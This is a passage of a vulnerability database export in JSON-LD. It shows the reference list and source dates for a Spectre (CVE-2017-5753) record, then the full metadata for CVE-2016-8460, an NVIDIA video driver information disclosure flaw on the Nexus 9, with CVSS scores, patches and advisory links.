        "url": "https://access.redhat.com/errata/rhsa-2018:0047"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/3307851"
      },
      {
        "trust": 0.1,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/spectreandmeltdown"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3540-2"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3540-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-xenial/4.4.0-111.134~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18241"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1066"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16911"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9016"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-0861"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16914"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000199"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16526"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7492"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16913"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1092"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13220"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16912"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18203"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1000004"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.17.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.17.10.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/nvidia-graphics-drivers-384/384.111-0ubuntu0.16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3521-1"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/itunes/"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3523-1,"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3541-1,"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-37.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.13.0-1015.16"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/usn/usn-3597-1,"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-a00039267en_us\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://developer.arm.com/support/security-update\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.amd.com/en/corporate/speculative-execution\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://newsroom.intel.com/press-kits/security-exploits-intel-products/\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "https://webkitgtk.org/security/wsa-2018-0001.html"
      },
      {
        "trust": 0.1,
        "url": "https://webkitgtk.org/security.html"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145774"
      },
      {
        "db": "PACKETSTORM",
        "id": "145762"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146026"
      },
      {
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "db": "PACKETSTORM",
        "id": "145837"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145774"
      },
      {
        "db": "PACKETSTORM",
        "id": "145762"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146026"
      },
      {
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "db": "PACKETSTORM",
        "id": "145837"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-21T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "date": "2018-01-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "date": "2018-01-03T00:00:00",
        "db": "BID",
        "id": "102371"
      },
      {
        "date": "2018-01-06T18:01:06",
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "date": "2018-01-23T04:32:09",
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "date": "2018-05-03T01:31:56",
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "date": "2018-01-04T01:20:35",
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "date": "2018-01-09T17:32:51",
        "db": "PACKETSTORM",
        "id": "145774"
      },
      {
        "date": "2018-01-09T17:13:40",
        "db": "PACKETSTORM",
        "id": "145762"
      },
      {
        "date": "2018-03-15T15:54:32",
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "date": "2018-01-04T17:53:07",
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "date": "2018-01-24T00:28:48",
        "db": "PACKETSTORM",
        "id": "146026"
      },
      {
        "date": "2018-02-09T15:01:04",
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "date": "2018-01-11T01:02:22",
        "db": "PACKETSTORM",
        "id": "145837"
      },
      {
        "date": "2018-01-04T00:52:58",
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "date": "2018-01-04T13:29:00.257000",
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-06-19T00:00:00",
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "date": "2018-01-08T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "date": "2021-11-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "date": "2019-04-17T06:00:00",
        "db": "BID",
        "id": "102371"
      },
      {
        "date": "2021-11-23T22:14:00.490000",
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "db": "PACKETSTORM",
        "id": "145774"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "CPU hardware utilizing speculative execution may be vulnerable to cache side-channel attacks",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "102371"
      }
    ],
    "trust": 0.3
  }
}

var-201701-0131
Vulnerability from variot

An information disclosure vulnerability in the NVIDIA video driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as High because it could be used to access sensitive data without explicit user permission. Product: Android. Versions: Kernel-3.10. Android ID: A-31668540. References: N-CVE-2016-8460. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIAVideoDriver is an NVIDIA graphics driver component used in it. Google Android is prone to an information-disclosure vulnerability. Information obtained may aid in further attacks. Nexus 9 is vulnerable

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0131",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "9"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Pi (@heisecode) of Trend Micro",
    "sources": [
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8460",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2016-8460",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00510",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8460",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8460",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00510",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-030",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8460",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An information disclosure vulnerability in the NVIDIA video driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as High because it could be used to access sensitive data without explicit user permission. Product: Android. Versions: Kernel-3.10. Android ID: A-31668540. References: N-CVE-2016-8460. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIAVideoDriver is an NVIDIA graphics driver component used in it. Google Android is prone to an information-disclosure vulnerability. Information obtained may aid in further attacks. \nNexus 9 is vulnerable",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8460",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95249",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "id": "VAR-201701-0131",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:29:52.757000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "GoogleAndroidNVIDIAVideoDriver Information Disclosure Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/88092"
      },
      {
        "title": "Google Nexus 9 NVIDIA Video Fixes for driver information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66774"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95249"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8460"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8460"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "db": "BID",
        "id": "95249"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95249"
      },
      {
        "date": "2017-01-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "date": "2017-01-12T20:59:01.483000",
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00510"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8460"
      },
      {
        "date": "2017-01-12T03:10:00",
        "db": "BID",
        "id": "95249"
      },
      {
        "date": "2017-01-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006853"
      },
      {
        "date": "2017-01-18T02:59:15.813000",
        "db": "NVD",
        "id": "CVE-2016-8460"
      },
      {
        "date": "2017-01-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-030"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
